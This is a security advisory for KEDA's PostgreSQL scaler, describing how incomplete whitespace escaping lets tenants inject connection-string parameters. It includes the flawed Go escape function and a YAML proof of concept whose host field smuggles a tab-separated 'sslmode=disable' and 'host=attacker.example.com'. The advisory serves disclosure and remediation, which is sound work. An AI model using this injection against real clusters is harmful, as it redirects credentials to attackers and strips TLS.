GHSA-6w3m-4hhp-775q
KEDA has PostgreSQL connection string parameter injection via incomplete whitespace escaping
Details
### Summary `pkg/scalers/postgresql_scaler.go` builds libpq-style connection strings by concatenating `key=value` pairs separated by spaces. Each tenant-controllable field (`host`, `port`, `userName`, `dbName`, `sslmode`) is passed through `escapePostgreConnectionParameter`: ```go func escapePostgreConnectionParameter(str string) string { if !strings.Contains(str, " ") { return str // returned as-is for any non-space whitespace } str = strings.ReplaceAll(str, "'", "\\'") return fmt.Sprintf("'%s'", str) } ``` The function only escapes when a literal **space** is present. Per libpq/pgx documentation, parameters are also separated by **tabs, newlines, carriage returns, and form feeds**, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like `mydb\tsslmode=disable\thost=attacker.example.com` splits into additional `key=value` tokens when parsed by pgx, injecting attacker-controlled connection parameters.
### Vulnerable code `pkg/scalers/postgresql_scaler.go`, lines 155–164 and 250–257.
### Impact Tenants with the ability to create a `TriggerAuthentication` or `ScaledObject` that populates any of `host`, `port`, `userName`, `dbName`, `sslmode` can: - **Force `sslmode=disable`** on a connection that the cluster owner intended to be TLS-only — silently downgrading to plaintext and enabling on-path MitM. - **Redirect the connection to an attacker-controlled host** (`host=...`) to steal the credentials the operator supplies via the `password=` keyword. - Append arbitrary libpq runtime parameters (`options=`, `application_name=`, `target_session_attrs=`) to pivot behavior.
Note: the password parameter is appended **last** in `buildConnArray`, which limits but does not eliminate credential exfiltration — injected `host=` still redirects the subsequent `password=` keyword's target.
### Proof of concept ```yaml triggers: - type: postgresql metadata: host: "legit.db.svc\tsslmode=disable\thost=attacker.example.com" port: "5432" userName: "keda" dbName: "metrics" sslmode: "require" query: "SELECT 1" ``` After `escapePostgreConnectionParameter` (no space → returned unchanged), the resulting connection string is parsed by pgx into parameters that include `host=attacker.example.com` and `sslmode=disable`.
### Suggested fix - Escape / reject any ASCII whitespace (`\t`, `\n`, `\r`, `\f`, `\v`, space) and backslash. - Prefer the URI form (`postgres://user:pass@host:port/db?sslmode=require`) with proper URL-encoding. - Validate each field against an allow-list pattern before use.
### Resources - `pkg/scalers/postgresql_scaler.go` - libpq connection string parsing: https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING
Are you affected?
Enter the version of the package you're using.
Affected packages
0 Fixed in: 2.20.0 go get github.com/kedacore/keda/v2@v2.20.0